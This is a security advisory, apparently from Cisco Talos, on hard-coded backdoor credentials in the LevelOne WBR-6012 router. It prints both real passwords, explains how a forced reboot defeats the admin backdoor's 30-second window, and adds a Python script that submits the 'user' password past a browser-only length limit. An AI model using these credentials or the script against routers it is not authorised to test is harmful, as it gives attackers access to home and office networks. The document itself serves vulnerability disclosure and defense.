CVE-2024-28875,CVE-2024-31151
Hard-coded credentials in the web services of the LevelOne WBR-6012 allow an attacker to gain unauthorized access. One backdoor password is accepted only during the first 30 seconds after boot, but other vulnerabilities in the device can force a reboot, circumventing that time restriction; a second, undocumented account is usable at any time.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
LevelOne WBR-6012 R0.40e6
WBR-6012 - https://us.level1.com/products/wbr-6012
8.1 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-798 - Use of Hard-coded Credentials
The WBR-6012 is a wireless SOHO router. It is a low-cost device which functions as an internet gateway for homes and small offices while aiming to be easy to configure and operate. In addition to providing a WiFi access point, the device serves as a 4-port wired router and implements a variety of common SOHO router capabilities such as port forwarding, quality-of-service, web-based administration, a DHCP server, a basic DMZ, and UPnP capabilities.
The device ships with two backdoors: a hard-coded admin backdoor password and an undocumented user account with a hard-coded password.
During the first 30 seconds after the device (re)boots, the web application accepts the hard-coded backdoor password "@m!t2K1". An attacker can trigger a reboot through any of several other vulnerabilities in the device, which removes the 30-second limitation in practice.
An undocumented "user" account exists with the hard-coded password "AriesSerenaCairryNativitaMegan". The device's configuration and management interface offers no way to remove this user or change its credentials. The web application's login form limits the password to 9 characters, but the limit is enforced only in the browser: removing it with the browser's developer tools, or submitting the authentication request outside the browser, lets this password authenticate the sender's IP address with user-level privileges.
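Because the 9-character limit lives only in the HTML form, any client that builds the login request itself sends the full password. The script below is an added example for checking a device from outside a browser; it is not Talos's or LevelOne's code. The login-page HTML, the form path `/cgi-bin/login.cgi` and the field names `username`/`password` are constructed assumptions for illustration and must be replaced with what the real device serves; only the hard-coded password itself comes from the advisory.

```python
"""Submit the hard-coded "user" credential without the browser-side maxlength limit."""
from html.parser import HTMLParser
from urllib.parse import urlencode, urljoin
import urllib.request

HARDCODED_USER_PASSWORD = "AriesSerenaCairryNativitaMegan"   # from the advisory

# Constructed stand-in for the login page (NOT captured from a WBR-6012):
# the path and field names are assumptions, the maxlength mirrors the advisory.
SAMPLE_LOGIN_PAGE = """
<form name="login" method="post" action="/cgi-bin/login.cgi">
  <input type="text" name="username" maxlength="9">
  <input type="password" name="password" maxlength="9">
  <input type="submit" value="Login">
</form>
"""


class _FormParser(HTMLParser):
    """Collect the first <form> and its named <input> fields, including maxlength."""

    def __init__(self):
        super().__init__()
        self.form = None
        self.fields = {}
        self._in_form = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and self.form is None:
            self.form = {"action": a.get("action") or "", "method": (a.get("method") or "get").lower()}
            self._in_form = True
        elif tag == "input" and self._in_form and a.get("name"):
            self.fields[a["name"]] = {
                "type": (a.get("type") or "text").lower(),
                "maxlength": int(a["maxlength"]) if a.get("maxlength") else None,
            }

    def handle_endtag(self, tag):
        if tag == "form":
            self._in_form = False


def parse_login_form(html: str) -> dict:
    """Return {'action', 'method', 'fields'} for the first form on the page."""
    p = _FormParser()
    p.feed(html)
    if p.form is None:
        raise ValueError("no <form> found on login page")
    return {**p.form, "fields": p.fields}


def browser_would_truncate(form: dict, password: str) -> bool:
    """True when a browser honouring maxlength could never submit this password intact."""
    limits = [f["maxlength"] for f in form["fields"].values()
              if f["type"] == "password" and f["maxlength"]]
    return any(len(password) > limit for limit in limits)


def build_login_request(base_url: str, form: dict, username: str, password: str):
    """Return (url, body) for the POST; maxlength is deliberately ignored."""
    data = {}
    for name, meta in form["fields"].items():
        if meta["type"] == "password":
            data[name] = password
        elif meta["type"] in ("text", "email"):
            data[name] = username
    return urljoin(base_url, form["action"]), urlencode(data).encode()


def check_device(base_url: str, timeout: float = 5.0):
    """Fetch the real login page and submit the hard-coded credential (authorised testing only).

    Returns the HTTP status and body; what a successful login looks like is
    device-specific and must be confirmed against a known-good session.
    """
    with urllib.request.urlopen(base_url, timeout=timeout) as resp:
        form = parse_login_form(resp.read().decode(errors="replace"))
    url, body = build_login_request(base_url, form, "user", HARDCODED_USER_PASSWORD)
    req = urllib.request.Request(url, data=body, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read().decode(errors="replace")


if __name__ == "__main__":
    form = parse_login_form(SAMPLE_LOGIN_PAGE)
    print("browser would truncate:", browser_would_truncate(form, HARDCODED_USER_PASSWORD))
    print(*build_login_request("http://192.0.2.1/", form, "user", HARDCODED_USER_PASSWORD))
```

The same pattern is the general lesson of this finding: an HTML `maxlength` is a usability hint, not an authentication control, so any length or character-set restriction that matters must be enforced on the device itself. Note that because the device authenticates by source IP, a successful check leaves that address logged in until the session expires.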
2024-06-03 - Vendor Disclosure
2024-08-05 - Status update request from Talos - no reply
2024-09-03 - Status update request - Impending public release notification
2024-10-23 - Vendor notification of upcoming release date
2024-10-30 - Public Release
Discovered by Francesco Benvenuto and Patrick DeSantis of Cisco Talos.